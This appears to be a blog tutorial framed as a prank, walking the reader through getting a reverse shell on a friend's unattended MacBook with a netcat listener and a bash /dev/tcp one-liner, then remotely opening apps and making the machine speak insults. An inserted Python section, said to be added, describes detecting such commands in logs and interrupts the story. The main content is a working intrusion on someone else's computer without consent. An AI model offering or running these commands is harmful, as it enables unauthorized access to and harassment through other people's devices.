Real Scenarios #1: The New MacBook
You're at your friend's house. All you've heard about all day is his new laptop. He's got a brand new top-specced MacBook Pro, and he won't stop going on about it. It particularly annoys you as all you've got is a cheap 4-year-old laptop, even if it is running Linux.
If only there was some way to make him stop gloating!
Your goal is to be able to remotely control his computer, then whilst he's on it get it to do something that will shut him up.
Unfortunately, OSX is a pretty secure OS, so there aren't many quick exploits you can run.
Whilst you're pondering this conundrum, your friend leaves the room to get a drink, and he's left his new laptop unlocked! This is your chance!
You probably have 120 seconds before he gets back. What can you do in that time to get remote control of his computer?
You flip up the screen of your laptop, launch a terminal in Kali and type ifconfig.
You note your IP, 192.168.1.88, then turn to his computer.
What you want is a shell on his computer, through a TCP connection to yours, and you need to set it up in the least time possible!
Type the following to listen for a connection on port 1234 (you can use whichever port you like as long as it's not being used by something else):
nc -l -p 1234
First, you create a new desktop on his Mac as you don't want him to see what you've done.
Then, you open a terminal and type the following:
bash -i >& /dev/tcp/192.168.1.88/1234 0>&1
This creates a TCP connection to 192.168.1.88 (your IP), on port 1234, and sends bash through it, in effect creating a reverse shell.
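Seen from the defender's side, that command line has a distinctive shape in process-execution or shell-history logs: an interactive shell whose output and stdin are both redirected to a /dev/tcp path. The Python sketch below is an added example, not part of the original post; the function names and the sample log lines are constructed for illustration.

```python
import re

# bash handles /dev/tcp/HOST/PORT and /dev/udp/HOST/PORT itself and opens a socket,
# so the remote endpoint is readable straight from the command line.
NET_REDIR = re.compile(r"/dev/(tcp|udp)/([^/\s'\"]+)/(\d{1,5})")
# A shell started with an explicit interactive flag, e.g. "bash -i" or "sh -i".
INTERACTIVE = re.compile(r"\b(?:ba|z|k|da)?sh\s+(?:-\w+\s+)*-\w*i\w*\b")
# stdin duplicated from another descriptor ("0>&1" / "0<&1"): the remote end can type.
STDIN_DUP = re.compile(r"\b0[<>]&\d")


def classify(cmdline):
    """Return None if the line has no /dev/tcp|udp redirection, else a finding dict."""
    m = NET_REDIR.search(cmdline)
    if not m:
        return None
    interactive = bool(INTERACTIVE.search(cmdline))
    stdin_dup = bool(STDIN_DUP.search(cmdline))
    # Interactive shell + stdin wired to the socket is the reverse-shell shape;
    # a bare /dev/tcp write is often just a connectivity check, so it only gets "review".
    severity = "high" if interactive and stdin_dup else "review"
    return {"proto": m.group(1), "host": m.group(2),
            "port": int(m.group(3)), "severity": severity}


def scan(lines):
    """Yield (line_number, finding) for every logged command that opens a socket."""
    for n, line in enumerate(lines, 1):
        finding = classify(line)
        if finding:
            yield n, finding


# Constructed sample of logged command lines (not real telemetry).
SAMPLE = [
    "ls -la /Users/friend/Documents",
    "bash -i >& /dev/tcp/192.168.1.88/1234 0>&1",
    "bash -c 'echo > /dev/tcp/192.168.1.1/443'",  # plain connectivity check
    "open -a safari",
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE):
        print(f"line {n}: {f['severity']:6} {f['proto']}://{f['host']}:{f['port']}")
```

The same host and port can then be matched against outbound connection logs to confirm whether the session was actually established.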
You also turn his volume up, for something you have planned later...
You put down his laptop just as he re-enters the room.
Now you have a shell on his system!
You've achieved your goal! You now have remote access to his computer!
Well, first let's just annoy and puzzle him by repeatedly opening Safari:
open -a safari
This gets sent through our TCP connection and opens Safari on his screen.
We do this a few times and can visibly see him getting annoyed. Oh the joy :)
Now let's have some fun by getting his computer to say things; on OSX there's a say command, which speaks text out loud, so let your imagination run wild as to what you get it to say.
In this case, let's just make him believe he's got an error by typing the following:
say "Segmentation fault. Please return to vendor"
Oh, the look on his face.
You've had your fun, so you wind it up by saying the following in a Zarvox voice (because why the heck not):
say -v "Zarvox" "You are an idiot. Your friend, however, is awesome."
Hope you enjoyed :)